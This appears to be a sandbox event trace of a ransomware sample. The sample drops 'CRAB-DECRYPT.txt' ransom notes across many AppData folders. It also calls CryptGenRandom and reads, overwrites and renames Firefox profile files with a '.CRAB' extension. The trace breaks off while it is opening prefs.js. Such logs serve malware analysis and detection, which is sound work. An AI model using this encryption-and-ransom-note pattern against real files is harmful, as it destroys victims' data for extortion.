| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\P7UB2489\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\AddIns\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Bibliography\Style\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Credentials\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Document Building Blocks\1033\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Excel\XLSTART\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\InputMethod\Chs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\MMC\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Office\Recent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Outlook\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\PowerPoint\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Proof\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Protect\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Publisher Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Speech\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Spelling\en-US\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Effects\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Fonts\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Bibliography Styles\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\1033\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Vault\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Pending Pings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\bookmarkbackups\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\crashes\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\crashes\events\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp\WINNT_x86_64-msvc\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\minidumps\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576, size_out = 1048576 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 1048576, size_out = 0 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\places.sqlite.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat, size = 1048576, size_out = 175 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat, size = 176 |
|
1 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat, size = 256 |
|
2 | |
| File | Write | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat, size = 16 |
|
1 | |
| File | Move | source_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat, destination_filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\pluginreg.dat.CRAB |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x76dc0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x76de10a0 |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\prefs.js, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
